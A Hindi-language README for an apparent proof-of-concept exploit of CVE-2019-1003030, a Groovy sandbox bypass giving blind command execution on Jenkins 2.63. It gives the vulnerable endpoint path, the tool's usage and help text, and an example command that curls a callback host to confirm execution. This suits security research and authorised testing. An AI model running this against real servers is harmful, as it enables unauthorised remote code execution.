
jenkins 2.63 के लिए PoC CVE-2019-1003030
यह प्रोजेक्ट जेन्किन्स 2.63 द्वारा उपयोग किए जाने वाले Jenkins SecureGroovyScript सत्यापन एंडपॉइंट पर Groovy पेलोड बनाने और वितरित करने को स्वचालित करता है। उपकरण इंटरैक्टिव और एक-शॉट निष्पादन दोनों का समर्थन करता है। एक्सप्लॉइट कोई आउटपुट नहीं लौटाता, इसलिए आपको कुछ सत्यापन करने होंगे जैसे अपने AP पर curl करना ताकि यह सुनिश्चित हो सके कि यह काम करता है।
उपकरण दोनों का समर्थन करता है:
अस्वीकरण
यह प्रोजेक्ट केवल सुरक्षा अनुसंधान, CTFs, प्रयोगशाला वातावरण और अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। इसे स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।
usage: Poc.py -u http://10.10.10.10:8080/ [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]
PoC for sandbox bypass for jenkins 2.63
options:
-h, --help show this help message and exit
-u, --url URL ip of target
-X, --method METHOD post or get
-b, --breadcrum BREADCRUM
optional jenkins crumb string
-c, --command COMMAND
command to run on jenkins, not output expected
-p, --path PATH path to the script, you might prepend more
-c विकल्प को छोड़कर इंटरैक्टिव प्रॉम्प्ट में प्रवेश करें। नीचे उदाहरण दिया गया है, दुर्भाग्य से कोई आउटपुट नहीं है, इसलिए जब तक आपको 404 नहीं मिल रहा है, यह काम कर रहा होना चाहिए
